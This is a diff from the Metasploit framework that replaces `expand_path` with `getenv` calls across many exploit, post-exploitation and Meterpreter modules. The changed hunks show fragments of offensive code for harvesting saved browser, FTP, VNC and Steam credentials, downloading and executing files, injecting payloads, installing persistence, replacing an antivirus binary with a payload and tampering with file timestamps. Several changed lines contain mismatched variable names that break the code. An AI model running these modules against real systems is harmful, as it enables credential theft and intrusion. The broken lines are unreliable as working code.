modules/exploits/windows/novell/file_reporter_fsfui_upload.rb

@@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     begin
       print_good("Deleting the VBS payload \"#{@var_vbs_name}.vbs\" ...")
-      windir = client.fs.file.expand_path("%WINDIR%")
+      windir = client.sys.config.getenv('WINDIR')
       client.fs.file.rm("#{windir}\\system32\\" + @var_vbs_name + ".vbs")
       print_good("Deleting the MOF file \"#{@var_mof_name}.mof\" ...")
       cmd = "#{windir}\\system32\\attrib.exe -r " +

modules/exploits/windows/novell/netiq_pum_eval.rb

@@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
       win_file = file.gsub("/", "\\\\")
       if session.type == "meterpreter"
         begin
-          windir = session.fs.file.expand_path("%WINDIR%")
+          windir = session.sys.config.getenv('WINDIR')
           win_file = "#{windir}\\system32\\#{win_file}"
           # Meterpreter should do this automatically as part of
           # fs.file.rm().  Until that has been implemented, remove the

modules/post/linux/manage/download_exec.rb

@@ -45,7 +45,7 @@ class Metasploit3 < Msf::Post
   end
 
   def exists_exe?(exe)
-    path = expand_path("$PATH")
+    path = session.sys.config.getenv("PATH")
     if path.nil? or path.empty?
       return false
     end

modules/post/multi/gather/apple_ios_backup.rb

@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Post
       paths = enum_users_unix
     when /win/
       @platform = :windows
-      drive = session.fs.file.expand_path("%SystemDrive%")
+      drive = session.sys.config.getenv('SystemDrive')
       os = session.sys.config.sysinfo['OS']
 
       if os =~ /Windows 7|Vista|2008/
@@ -265,7 +265,7 @@ class Metasploit3 < Msf::Post
 
   def whoami
     if @platform == :windows
-      session.fs.file.expand_path("%USERNAME%")
+      session.sys.config.getenv('USERNAME')
     else
       session.shell_command("whoami").chomp
     end

modules/post/multi/gather/env.rb

@@ -54,9 +54,8 @@ class Metasploit3 < Msf::Post
       var_names << registry_enumvals("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment")
       output = []
       var_names.delete(nil)
-      var_names.flatten.uniq.sort.each do |v|
+      session.sys.config.getenvs(*var_names.flatten.uniq.sort).each do |k, v|
-        # Emulate the output of set and env, e.g. VAR=VALUE
+        output << "#{k}=#{v}"
-        output << "#{v}=#{session.fs.file.expand_path("\%#{v}\%")}"
       end
       @output = output.join("\n")
       @ltype = "windows.environment"

modules/post/multi/gather/filezilla_client_cred.rb

@@ -240,7 +240,7 @@ class Metasploit3 < Msf::Post
 
   def whoami
     if @platform == :windows
-      session.fs.file.expand_path("%USERNAME%")
+      session.sys.config.getenv('USERNAME')
     else
       session.shell_command("whoami").chomp
     end

modules/post/multi/gather/firefox_creds.rb

@@ -277,7 +277,6 @@ class Metasploit3 < Msf::Post
   def get_ff_and_loot_path
     @paths = {}
     check_paths = []
-    drive = expand_path("%SystemDrive%")
     loot_file = Rex::Text::rand_text_alpha(6) + ".txt"
 
     case @platform
@@ -286,7 +285,9 @@ class Metasploit3 < Msf::Post
         print_error("You need root privileges on this platform for DECRYPT option")
         return false
       end
-      tmpdir = expand_path("%TEMP%") + "\\"
+      env_vars = session.sys.config.getenvs('TEMP', 'SystemDrive')
+      tmpdir = env_vars['TEMP'] + "\\"
+      drive = env_vars['SystemDrive']
       # this way allows for more independent use of meterpreter
       # payload (32 and 64 bit) and cleaner code
       check_paths << drive + '\\Program Files\\Mozilla Firefox\\'
@@ -643,9 +644,9 @@ class Metasploit3 < Msf::Post
 
   def whoami
     if @platform == :windows
-      return session.fs.file.expand_path("%USERNAME%")
+      session.sys.config.getenv('USERNAME')
     else
-      return session.shell_command("whoami").chomp
+      session.shell_command("whoami").chomp
     end
   end
 end

modules/post/multi/gather/pidgin_cred.rb

@@ -307,7 +307,7 @@ class Metasploit3 < Msf::Post
 
   def whoami
     if @platform == :windows
-      session.fs.file.expand_path("%USERNAME%")
+      session.sys.config.getenv('USERNAME')
     else
       session.shell_command("whoami").chomp
     end

modules/post/multi/gather/thunderbird_creds.rb

@@ -50,7 +50,7 @@ class Metasploit3 < Msf::Post
       base = "/Users/#{user}/Library/Thunderbird/Profiles/"
     when /win/
       if session.type =~ /meterpreter/
-        user_profile = session.fs.file.expand_path("%APPDATA%")
+        user_profile = session.sys.config.getenv('APPDATA')
       else
         user_profile = cmd_exec("echo %APPDATA%").strip
       end

modules/post/windows/escalate/ms10_073_kbdlayout.rb

@@ -176,7 +176,7 @@ EOS
     ring0_code.gsub!('TPTP', [pid].pack('V'))
 
     # Create the malicious Keyboard Layout file...
-    tmpdir = session.fs.file.expand_path("%TEMP%")
+    tmpdir = session.sys.config.getenv('TEMP')
     fname = "p0wns.boom"
     dllpath = "#{tmpdir}\\#{fname}"
     fd = session.fs.file.new(dllpath, 'wb')

modules/post/windows/escalate/net_runtime_modify.rb

@@ -41,7 +41,7 @@ class Metasploit3 < Msf::Post
     paths = []
     services = []
     vuln = ""
-    @temp = session.fs.file.expand_path("%TEMP%")
+    @temp = session.sys.config.getenv('TEMP')
 
     if init_railgun() == :error
       return

modules/post/windows/gather/credentials/bulletproof_ftp.rb

@@ -233,12 +233,14 @@ class Metasploit3 < Msf::Post
 
     print_status("Searching BulletProof FTP Client installation directory...")
     # BulletProof FTP Client 2.6 uses the installation dir to store bookmarks files
-    program_files_x86 = expand_path('%ProgramFiles(X86)%')
+    progfiles_env = session.sys.config.getenvs('ProgramFiles(X86)', 'ProgramFiles')
-    if not program_files_x86.empty? and program_files_x86 !~ /%ProgramFiles\(X86\)%/
+    progfilesx86 = prog_files_env['ProgramFiles(X86)']
-      program_files = program_files_x86 #x64
+    if not progfilesx86.empty? and progfilesx86 !~ /%ProgramFiles\(X86\)%/
+      program_files = progfilesx86 # x64
     else
-      program_files = expand_path('%ProgramFiles%') #x86
+      program_files = progfiles_env['ProgramFiles'] # x86
     end
+
     session.fs.dir.foreach(program_files) do |dir|
       if dir =~ /BulletProof FTP Client/
         vprint_status("BulletProof Installation directory found at #{program_files}\\#{dir}")

modules/post/windows/gather/credentials/filezilla_server.rb

@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Post
       return
     end
 
-    drive = session.fs.file.expand_path("%SystemDrive%")
+    drive = session.sys.config.getenv('SystemDrive')
     case session.platform
     when /win64/i
       @progs = drive + '\\Program Files (x86)\\'
@@ -360,6 +360,6 @@ class Metasploit3 < Msf::Post
   end
 
   def whoami
-    return session.fs.file.expand_path("%USERNAME%")
+    return session.sys.config.getenv('USERNAME')
   end
 end

modules/post/windows/gather/credentials/steam.rb

@@ -40,10 +40,12 @@ class Metasploit3 < Msf::Post
     # Steam client is only 32 bit so we need to know what arch we are on so that we can use
     # the correct program files folder.
     # We will just use an x64 only defined env variable to check.
-    if not expand_path('%ProgramFiles(X86)%').empty? and expand_path('%ProgramFiles(X86)%') !~ /%ProgramFiles\(X86\)%/
+    progfiles_env = session.sys.config.getenvs('ProgramFiles(X86)', 'ProgramFiles')
-      progs = expand_path('%ProgramFiles(X86)%') #x64
+    progfilesx86 = prog_files_env['ProgramFiles(X86)']
+    if not progfilesx86.empty? and progfilesx86 !~ /%ProgramFiles\(X86\)%/
+      progs = progfilesx86 # x64
     else
-      progs = expand_path('%ProgramFiles%') #x86
+      progs = progfiles_env['ProgramFiles'] # x86
     end
     path = progs + '\\Steam\\config'
 

modules/post/windows/gather/credentials/tortoisesvn.rb

@@ -103,8 +103,7 @@ class Metasploit3 < Msf::Post
   def get_config_files
     # Determine if TortoiseSVN is installed and parse config files
     savedpwds = 0
-    user_appdata = session.fs.file.expand_path("%APPDATA%")
+    path = session.fs.file.expand_path("%APPDATA%\\Subversion\\auth\\svn.simple\\")
-    path = user_appdata + '\\Subversion\\auth\\svn.simple\\'
     print_status("Checking for configuration files in: #{path}")
 
     begin

modules/post/windows/gather/credentials/total_commander.rb

@@ -107,7 +107,7 @@ class Metasploit3 < Msf::Post
   end
 
   def check_systemroot
-    winpath = expand_path("%SYSTEMROOT%")+'\\wcx_ftp.ini'
+    winpath = expand_path("%SYSTEMROOT%\\wcx_ftp.ini")
     check_other(winpath)
   end
 

modules/post/windows/gather/credentials/vnc.rb

@@ -98,11 +98,15 @@ class Metasploit3 < Msf::Post
     locations = []
 
     #Checks
+    progfiles_env = session.sys.config.getenvs('ProgramFiles', 'ProgramFiles(x86)')
+    progfiles_env.each do |k, v|
+      next if v.blank?
       locations << {:name => 'UltraVNC',
-      :check_file => session.fs.file.expand_path("%PROGRAMFILES%")+'\\UltraVNC\\ultravnc.ini',
+        :check_file => "#{v}\\UltraVNC\\ultravnc.ini",
         :pass_variable => 'passwd=',
         :viewonly_variable => 'passwd2=',
         :port_variable => 'PortNumber='}
+    end
 
     locations << {:name => 'WinVNC3_HKLM',
       :check_reg => 'HKLM\\Software\\ORL\\WinVNC3',

modules/post/windows/gather/credentials/winscp.rb

@@ -237,7 +237,7 @@ class Metasploit3 < Msf::Post
 
   def run
     print_status("Looking for WinSCP.ini file storage...")
-    get_ini(client.fs.file.expand_path("%PROGRAMFILES%")+'\\WinSCP\\WinSCP.ini')
+    get_ini(client.fs.file.expand_path("%PROGRAMFILES%\\WinSCP\\WinSCP.ini"))
     print_status("Looking for Registry Storage...")
     get_reg()
     print_status("Done!")

modules/post/windows/gather/dumplinks.rb

@@ -53,7 +53,8 @@ class Metasploit3 < Msf::Post
     user = session.sys.config.getuid
     userpath = nil
     useroffcpath = nil
-    sysdrv = session.fs.file.expand_path("%SystemDrive%")
+    env_vars = session.sys.config.getenvs('SystemDrive', 'USERNAME')
+    sysdrv = env_vars['SystemDrive']
     if os =~ /Windows 7|Vista|2008/
       userpath = sysdrv + "\\Users\\"
       lnkpath = "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\"
@@ -76,7 +77,7 @@ class Metasploit3 < Msf::Post
         userinfo = {}
       end
     else
-      uservar = session.fs.file.expand_path("%USERNAME%")
+      uservar = env_vars['USERNAME']
       userinfo['username'] = uservar
       userinfo['userpath'] = userpath + uservar + lnkpath
       userinfo['useroffcpath'] = userpath + uservar + officelnkpath

modules/post/windows/gather/enum_chrome.rb

@@ -285,7 +285,8 @@ class Metasploit3 < Msf::Post
     host = session.session_host
 
     #Get Google Chrome user data path
-    sysdrive = expand_path("%SYSTEMDRIVE%").strip
+    env_vars = session.sys.config.getenvs('SYSTEMDRIVE', 'USERNAME')
+    sysdrive = env_vars['SYSTEMDRIVE'].strip
     if directory?("#{sysdrive}\\Users")
       @profiles_path = "#{sysdrive}/Users"
       @data_path = "\\AppData\\Local\\Google\\Chrome\\User Data\\Default"
@@ -310,7 +311,7 @@ class Metasploit3 < Msf::Post
     else
       uid = session.sys.config.getuid
       print_status "Running as user '#{uid}'..."
-      usernames << expand_path("%USERNAME%").strip
+      usernames << env_vars['USERNAME'].strip
     end
 
     has_sqlite3 = true

modules/post/windows/gather/enum_db.rb

@@ -292,7 +292,7 @@ class Metasploit3 < Msf::Post
       return results
     end
 
-    windir = session.fs.file.expand_path("%windir%")
+    windir = session.sys.config.getenv('windir')
     getfile = session.fs.file.search(windir + "\\system32\\drivers\\etc\\","services.*",recurse=true,timeout=-1)
 
     data = nil
@@ -332,7 +332,7 @@ class Metasploit3 < Msf::Post
     elsif exist?(val_location + "\\my.cnf")
       data = read_file(val_location + "\\my.cnf")
     else
-      sysdriv=session.fs.file.expand_path("%SYSTEMDRIVE%")
+      sysdriv=session.sys.config.getenv('SYSTEMDRIVE')
       getfile = session.fs.file.search(sysdriv + "\\","my.ini",recurse=true,timeout=-1)
       getfile.each do |file|
         if exist?("#{file['path']}\\#{file['name']}")

modules/post/windows/gather/enum_files.rb

@@ -55,7 +55,7 @@ class Metasploit3 < Msf::Post
 
 
   def download_files(location, file_type)
-    sysdriv = client.fs.file.expand_path("%SYSTEMDRIVE%")
+    sysdriv = client.sys.config.getenv('SYSTEMDRIVE')
     sysnfo = client.sys.config.sysinfo['OS']
     profile_path_old = sysdriv + "\\Documents and Settings\\"
     profile_path_new = sysdriv + "\\Users\\"

modules/post/windows/gather/enum_ie.rb

@@ -257,7 +257,7 @@ class Metasploit3 < Msf::Post
     xp_c = "\\Cookies\\index.dat"
     h_paths = []
     c_paths = []
-    base = session.fs.file.expand_path("%USERPROFILE%")
+    base = session.sys.config.getenv('USERPROFILE')
     if host['OS'] =~ /(Windows 7|2008|Vista)/
       h_paths << base + vist_h
       h_paths << base + vist_hlow

modules/post/windows/gather/enum_powershell_env.rb

@@ -28,7 +28,8 @@ class Metasploit3 < Msf::Post
     users = []
     user = session.sys.config.getuid
     path4users = ""
-    sysdrv = session.fs.file.expand_path("%SystemDrive%")
+    env_vars = session.sys.config.getenvs('SystemDrive', 'USERNAME')
+    sysdrv = env_vars['SystemDrive']
 
     if os =~ /Windows 7|Vista|2008/
       path4users = sysdrv + "\\Users\\"
@@ -49,7 +50,7 @@ class Metasploit3 < Msf::Post
       end
     else
       userinfo = {}
-      uservar = session.fs.file.expand_path("%USERNAME%")
+      uservar = env_vars['USERNAME']
       userinfo['username'] = uservar
       userinfo['userappdata'] = path4users + uservar + profilepath
       users << userinfo
@@ -89,7 +90,7 @@ class Metasploit3 < Msf::Post
       end
       if powershell_version =~ /2./
         print_status("Powershell Modules:")
-        powershell_module_path = session.fs.file.expand_path("%PSModulePath%")
+        powershell_module_path = session.sys.config.getenv('PSModulePath')
         session.fs.dir.foreach(powershell_module_path) do |m|
           next if m =~ /^(\.|\.\.)$/
           print_status("\t#{m}")

modules/post/windows/gather/enum_prefetch.rb

@@ -183,7 +183,7 @@ class Metasploit3 < Msf::Post
     print_prefetch_key_value
     print_timezone_key_values(key_value)
     print_good("Current UTC Time: %s" % Time.now.utc)
-    sys_root = expand_path("%SYSTEMROOT%")
+    sys_root = session.sys.config.getenv('SYSTEMROOT')
     full_path = sys_root + "\\Prefetch\\"
     file_type = "*.pf"
     print_status("Gathering information from remote system. This will take awhile..")

modules/post/windows/gather/enum_unattend.rb

@@ -115,7 +115,7 @@ class Metasploit3 < Msf::Post
   # Initialize all 7 possible paths for the answer file
   #
   def init_paths
-    drive = session.fs.file.expand_path("%SystemDrive%")
+    drive = session.sys.config.getenv('SystemDrive')
 
     files =
       [

modules/post/windows/manage/download_exec.rb

@@ -35,7 +35,7 @@ class Metasploit3 < Msf::Post
     register_advanced_options(
       [
         OptString.new('EXEC_STRING',   [false, 'Execution parameters when run from download directory' ]),
-        OptInt.new('EXEC_TIMEOUT',     [true, 'Execution timeout', 60 ]),
+        OptInt.new(   'EXEC_TIMEOUT',  [true, 'Execution timeout', 60 ]),
         OptBool.new(  'DELETE',        [true, 'Delete file after execution', false ]),
       ], self.class)
 
@@ -76,16 +76,16 @@ class Metasploit3 < Msf::Post
     url = datastore["URL"]
     filename = datastore["FILENAME"] || url.split('/').last
 
-    download_path = session.fs.file.expand_path(datastore["DOWNLOAD_PATH"])
+    path = datastore['DOWNLOAD_PATH']
-    if download_path.nil? or download_path.empty?
+    if path.blank?
-      path = session.fs.file.expand_path("%TEMP%")
+      path = session.sys.config.getenv('TEMP')
     else
-      path = download_path
+      path = session.fs.file.expand_path(path)
     end
 
     outpath = path + '\\' + filename
     exec = datastore['EXECUTE']
-    exec_string = datastore['EXEC_STRING'] || ''
+    exec_string = datastore['EXEC_STRING']
     output = datastore['OUTPUT']
     remove = datastore['DELETE']
 
@@ -108,11 +108,7 @@ class Metasploit3 < Msf::Post
     # Execute file upon request
     if exec
       begin
-        cmd = "#{outpath} #{exec_string}"
+        cmd = "\"#{outpath}\" #{exec_string}"
-
-        # If we don't have the following gsub, we get this error in Windows:
-        # "Operation failed: The system cannot find the file specified"
-        cmd = cmd.gsub(/\\/, '\\\\\\').gsub(/\s/, '\ ')
 
         print_status("Executing file: #{cmd}")
         res = cmd_exec(cmd, nil, datastore['EXEC_TIMEOUT'])

modules/post/windows/manage/ie_proxypac.rb

@@ -87,7 +87,7 @@ class Metasploit3 < Msf::Post
   end
 
   def create_pac(local_pac)
-    pac_file = expand_path("%APPDATA%") << "\\" << Rex::Text.rand_text_alpha((rand(8)+6)) << ".pac"
+    pac_file = session.sys.config.getenv("APPDATA") << "\\" << Rex::Text.rand_text_alpha((rand(8)+6)) << ".pac"
     conf_pac = ""
 
     if ::File.exists?(local_pac)

modules/post/windows/manage/payload_inject.rb

@@ -159,7 +159,7 @@ class Metasploit3 < Msf::Post
   # Creates a temp notepad.exe to inject payload in to given the payload
   # Returns process PID
   def create_temp_proc(pay)
-    windir = client.fs.file.expand_path("%windir%")
+    windir = client.sys.config.getenv('windir')
     # Select path of executable to run depending the architecture
     if pay.arch.join == "x86" and client.platform =~ /x86/
       cmd = "#{windir}\\System32\\notepad.exe"

modules/post/windows/manage/rpcapd_start.rb

@@ -46,7 +46,8 @@ class Metasploit3 < Msf::Post
       else
         print_status("Rpcap service found: #{serv['Name']}")
         reg=registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\rpcapd","Start")
-        prog=expand_path("%ProgramFiles%") << "\\winpcap\\rpcapd.exe"
+        # TODO: check if this works on x64
+        prog=session.sys.config.getenv('ProgramFiles') << "\\winpcap\\rpcapd.exe"
         if reg != 2
           print_status("Setting rpcapd as 'auto' service")
           service_change_startup("rpcapd","auto")

modules/post/windows/manage/run_as.rb

@@ -106,7 +106,7 @@ class Metasploit3 < Msf::Post
     end
 
     # set profile paths
-    sysdrive = session.fs.file.expand_path("%SYSTEMDRIVE%")
+    sysdrive = session.sys.config.getenv('SYSTEMDRIVE')
     os = @host_info['OS']
     profiles_path = sysdrive + "\\Documents and Settings\\"
     profiles_path = sysdrive + "\\Users\\" if os =~ /(Windows 7|2008|Vista)/

modules/post/windows/manage/sdel.rb

@@ -57,8 +57,8 @@ class Metasploit3 < Msf::Post
 
   #Function to calculate the size of the cluster
   def size_cluster()
-    drive =  expand_path("%SystemDrive%")
+    drive =  session.sys.config.getenv('SystemDrive')
-    r = client.railgun.kernel32.GetDiskFreeSpaceA(drive,4,4,4,4)
+    r = session.railgun.kernel32.GetDiskFreeSpaceA(drive,4,4,4,4)
     cluster = r["lpBytesPerSector"] * r["lpSectorsPerCluster"]
     print_status("Cluster Size: #{cluster}")
 
@@ -68,7 +68,7 @@ class Metasploit3 < Msf::Post
 
   #Function to calculate the real file size on disk (file size + slack space)
   def size_on_disk(file)
-    size_file = client.fs.file.stat(file).size;
+    size_file = session.fs.file.stat(file).size;
     print_status("Size of the file: #{size_file}")
 
     if (size_file<800)
@@ -94,13 +94,13 @@ class Metasploit3 < Msf::Post
     rsec=  Rex::Text.rand_text_numeric(7,bad='012')
     date = Time.now - rsec.to_i
     print_status("Changing MACE attributes")
-    client.priv.fs.set_file_mace(file, date,date,date,date)
+    session.priv.fs.set_file_mace(file, date,date,date,date)
   end
 
   #Function to overwrite the file
   def file_overwrite(file,type,n)
     #FILE_FLAG_WRITE_THROUGH: Write operations will go directly to disk
-    r = client.railgun.kernel32.CreateFileA(file, "GENERIC_WRITE", "FILE_SHARE_READ|FILE_SHARE_WRITE", nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0)
+    r = session.railgun.kernel32.CreateFileA(file, "GENERIC_WRITE", "FILE_SHARE_READ|FILE_SHARE_WRITE", nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0)
     handle=r['return']
     real_size=size_on_disk(file)
 
@@ -118,10 +118,10 @@ class Metasploit3 < Msf::Post
       end
 
       #http://msdn.microsoft.com/en-us/library/windows/desktop/aa365541(v=vs.85).aspx
-      client.railgun.kernel32.SetFilePointer(handle,0,nil,"FILE_BEGIN")
+      session.railgun.kernel32.SetFilePointer(handle,0,nil,"FILE_BEGIN")
 
       #http://msdn.microsoft.com/en-us/library/windows/desktop/aa365747(v=vs.85).aspx
-      w=client.railgun.kernel32.WriteFile(handle,random,real_size,4,nil)
+      w=session.railgun.kernel32.WriteFile(handle,random,real_size,4,nil)
 
       if w['return']==false
         print_error("The was an error writing to disk, check permissions")
@@ -131,7 +131,7 @@ class Metasploit3 < Msf::Post
       print_status("#{w['lpNumberOfBytesWritten']} bytes overwritten")
     end
 
-    client.railgun.kernel32.CloseHandle(handle)
+    session.railgun.kernel32.CloseHandle(handle)
     change_mace(file)
 
     #Generate a long random file name before delete it
@@ -139,7 +139,7 @@ class Metasploit3 < Msf::Post
     print_status("Changing file name")
 
     #http://msdn.microsoft.com/en-us/library/windows/desktop/aa365239(v=vs.85).aspx
-    client.railgun.kernel32.MoveFileA(file,newname)
+    session.railgun.kernel32.MoveFileA(file,newname)
 
     file_rm(newname)
     print_good("File erased!")
@@ -148,7 +148,7 @@ class Metasploit3 < Msf::Post
   #Check if the file is encrypted or compressed
   def comp_encr(file)
     #http://msdn.microsoft.com/en-us/library/windows/desktop/aa364944(v=vs.85).aspx
-    handle=client.railgun.kernel32.GetFileAttributesA(file)
+    handle=session.railgun.kernel32.GetFileAttributesA(file)
     type= handle['return']
 
     #FILE_ATTRIBUTE_COMPRESSED=0x800

scripts/meterpreter/dumplinks.rb

@@ -61,7 +61,7 @@ def enum_users(os)
   user = @client.sys.config.getuid
   userpath = nil
   useroffcpath = nil
-  sysdrv = @client.fs.file.expand_path("%SystemDrive%")
+  sysdrv = @client.sys.config.getenv('SystemDrive')
   if os =~ /Windows 7|Vista|2008/
     userpath = sysdrv + "\\Users\\"
     lnkpath = "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\"
@@ -83,7 +83,7 @@ def enum_users(os)
       users << userinfo
     end
   else
-    uservar = @client.fs.file.expand_path("%USERNAME%")
+    uservar = @client.sys.config.getenv('USERNAME')
     userinfo['username'] = uservar
     userinfo['userpath'] = userpath + uservar + lnkpath
     userinfo['useroffcpath'] = userpath + uservar + officelnkpath

scripts/meterpreter/duplicate.rb

@@ -89,7 +89,7 @@ if client.platform =~ /win32|win64/
     #
     # Upload to the filesystem
     #
-    tempdir = client.fs.file.expand_path("%TEMP%")
+    tempdir = client.sys.config.getenv('TEMP')
     tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
     tempexe.gsub!("\\\\", "\\")
 

scripts/meterpreter/enum_chrome.rb

@@ -195,7 +195,7 @@ host = session.session_host
 @log_dir = File.join(Msf::Config.log_directory, "scripts", "enum_chrome", Rex::FileUtils.clean_path(@host_info['Computer']), Time.now.strftime("%Y%m%d.%H%M"))
 ::FileUtils.mkdir_p(@log_dir)
 
-sysdrive = client.fs.file.expand_path("%SYSTEMDRIVE%")
+sysdrive = client.sys.config.getenv('SYSTEMDRIVE')
 os = @host_info['OS']
 if os =~ /(Windows 7|2008|Vista)/
   @profiles_path = sysdrive + "\\Users\\"
@@ -218,7 +218,7 @@ if is_system?
   print_status "users found: #{usernames.join(", ")}"
 else
   print_status "running as user '#{uid}'..."
-  usernames << client.fs.file.expand_path("%USERNAME%")
+  usernames << client.sys.config.getenv('USERNAME')
   prepare_railgun
 end
 

scripts/meterpreter/enum_firefox.rb

@@ -251,8 +251,9 @@ if client.platform =~ /win32|win64/
   if frfxchk
     user = @client.sys.config.getuid
     if not is_system?
-      usrname = Rex::FileUtils.clean_path(@client.fs.file.expand_path("%USERNAME%"))
+      envs = @client.sys.config.getenvs('USERNAME', 'APPDATA')
-      db_path = @client.fs.file.expand_path("%APPDATA%") + "\\Mozilla\\Firefox\\Profiles"
+      usrname = envs['USERNAME']
+      db_path = envs['APPDATA'] + "\\Mozilla\\Firefox\\Profiles"
       if kill_frfx
         kill_firefox
       end

scripts/meterpreter/enum_powershell_env.rb

@@ -22,7 +22,7 @@ def enum_users
   users = []
   user = @client.sys.config.getuid
   path4users = ""
-  sysdrv = @client.fs.file.expand_path("%SystemDrive%")
+  sysdrv = @client.sys.config.getenv('SystemDrive')
 
   if os =~ /Windows 7|Vista|2008/
     path4users = sysdrv + "\\Users\\"
@@ -43,7 +43,7 @@ def enum_users
     end
   else
     userinfo = {}
-    uservar = @client.fs.file.expand_path("%USERNAME%")
+    uservar = @client.sys.config.getenv('USERNAME')
     userinfo['username'] = uservar
     userinfo['userappdata'] = path4users + uservar + profilepath
     users << userinfo
@@ -83,7 +83,7 @@ def enum_powershell
     end
     if powershell_version =~ /2./
       print_status("Powershell Modules:")
-      powershell_module_path = @client.fs.file.expand_path("%PSModulePath%")
+      powershell_module_path = @client.sys.config.getenv('PSModulePath')
       @client.fs.dir.foreach(powershell_module_path) do |m|
         next if m =~ /^(\.|\.\.)$/
         print_status("\t#{m}")

scripts/meterpreter/enum_vmware.rb

@@ -223,7 +223,7 @@ def enum_users
   users = []
   user = @client.sys.config.getuid
   path4users = ""
-  sysdrv = @client.fs.file.expand_path("%SystemDrive%")
+  sysdrv = @client.sys.config.getenv('SystemDrive')
 
   if os =~ /7|Vista|2008/
     path4users = sysdrv + "\\users\\"
@@ -244,7 +244,7 @@ def enum_users
     end
   else
     userinfo = {}
-    uservar = @client.fs.file.expand_path("%USERNAME%")
+    uservar = @client.sys.config.getenv('USERNAME')
     userinfo['username'] = uservar
     userinfo['userappdata'] = path4users + uservar + profilepath
     users << userinfo

scripts/meterpreter/get_env.rb

@@ -18,13 +18,12 @@ def list_env_vars(var_names)
           "Name",
           "Value"
         ])
-  var_names.flatten.each do |v|
+  @client.sys.config.getenvs(*var_names.flatten).each do |k, v|
-    tbl << [v,@client.fs.file.expand_path("\%#{v}\%")]
+    tbl << [k, v]
   end
   print("\n" + tbl.to_s + "\n")
 end
 
-
 opts.parse(args) { |opt, idx, val|
   case opt
   when "-h"

scripts/meterpreter/get_filezilla_creds.rb

@@ -114,7 +114,7 @@ def enum_users(os)
   users = []
 
   path4users = ""
-  sysdrv = @client.fs.file.expand_path("%SystemDrive%")
+  sysdrv = @client.sys.config.getenv('SystemDrive')
 
   if os =~ /7|Vista|2008/
     path4users = sysdrv + "\\users\\"
@@ -135,7 +135,7 @@ def enum_users(os)
     end
   else
     userinfo = {}
-    uservar = @client.fs.file.expand_path("%USERNAME%")
+    uservar = @client.sys.config.getenv('USERNAME')
     userinfo['username'] = uservar
     userinfo['userappdata'] = path4users + uservar + path2purple
     users << userinfo

scripts/meterpreter/get_pidgin_creds.rb

@@ -145,7 +145,7 @@ def enum_users(os)
   users = []
 
   path4users = ""
-  sysdrv = @client.fs.file.expand_path("%SystemDrive%")
+  sysdrv = @client.sys.config.getenv('SystemDrive')
 
   if os =~ /Windows 7|Vista|2008/
     path4users = sysdrv + "\\users\\"
@@ -166,7 +166,7 @@ def enum_users(os)
     end
   else
     userinfo = {}
-    uservar = @client.fs.file.expand_path("%USERNAME%")
+    uservar = @client.sys.config.getenv('USERNAME')
     userinfo['username'] = uservar
     userinfo['userappdata'] = path4users + uservar + path2purple
     users << userinfo

scripts/meterpreter/getcountermeasure.rb

@@ -301,7 +301,7 @@ def checkdep(session)
   tmpout = ""
   depmode = ""
   # Expand environment %TEMP% variable
-  tmp = session.fs.file.expand_path("%TEMP%")
+  tmp = session.sys.config.getenv('TEMP')
   # Create random name for the wmic output
   wmicfile = sprintf("%.5d",rand(100000))
   wmicout = "#{tmp}\\#{wmicfile}"

scripts/meterpreter/hostsedit.rb

@@ -30,7 +30,7 @@ end
 
 record = ""
 #Set path to the hosts file
-hosts = session.fs.file.expand_path("%SYSTEMROOT%")+"\\System32\\drivers\\etc\\hosts"
+hosts = session.sys.config.getenv('SYSTEMROOT')+"\\System32\\drivers\\etc\\hosts"
 #Function check if UAC is enabled
 def checkuac(session)
   winver = session.sys.config.sysinfo

scripts/meterpreter/panda_2007_pavsrv51.rb

@@ -69,16 +69,15 @@ elsif client.platform =~ /win32|win64/
       exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
 
       # Change to our working directory.
-      workingdir = client.fs.file.expand_path("%ProgramFiles%")
+      workingdir = client.sys.config.getenv('ProgramFiles') + "\\Panda Software\\Panda Antivirus 2007\\"
-      client.fs.dir.chdir(workingdir + "\\Panda Software\\Panda Antivirus 2007\\")
+      client.fs.dir.chdir(workindir)
 
       # Create a backup of the original exe.
       print_status("Creating a copy of PAVSRV51 (PAVSRV51_back.EXE)...")
       client.sys.process.execute("cmd.exe /c rename PAVSRV51.EXE PAVSRV51_back.EXE", nil, {'Hidden' => 'true'})
 
       # Place our newly created exe with the orginal binary name.
-      tempdir = client.fs.file.expand_path("%ProgramFiles%")
+      tempexe = workingdir + "PAVSRV51.EXE"
-      tempexe = tempdir + "\\Panda Software\\Panda Antivirus 2007\\" + "PAVSRV51.EXE"
 
       print_status("Sending EXE payload '#{tempexe}'.")
       fd = client.fs.file.new(tempexe, "wb")

scripts/meterpreter/persistence.rb

@@ -106,7 +106,7 @@ def write_script_to_target(target_dir,vbs)
   if target_dir
     tempdir = target_dir
   else
-    tempdir = @client.fs.file.expand_path("%TEMP%")
+    tempdir = @client.sys.config.getenv('TEMP')
   end
   tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
   fd = @client.fs.file.new(tempvbs, "wb")

scripts/meterpreter/pml_driver_config.rb

@@ -70,7 +70,7 @@ if client.platform =~ /win32|win64/
       exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
 
       # Place our newly created exe in %TEMP%
-      tempdir = client.fs.file.expand_path("%TEMP%")
+      tempdir = client.sys.config.getenv('TEMP')
       tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
       print_status("Sending EXE payload '#{tempexe}'.")
       fd = client.fs.file.new(tempexe, "wb")

scripts/meterpreter/prefetchtool.rb

@@ -19,7 +19,7 @@ require 'digest/sha1'
   "-l" => [ false,  "Download Prefetch Folder Analysis Log"]
 )
 
-@tempdir = @session.fs.file.expand_path("%TEMP%")
+@tempdir = @session.sys.config.getenv('TEMP')
 
 #---------------------------------------------------------------------------------------------------------
 def read_program_list

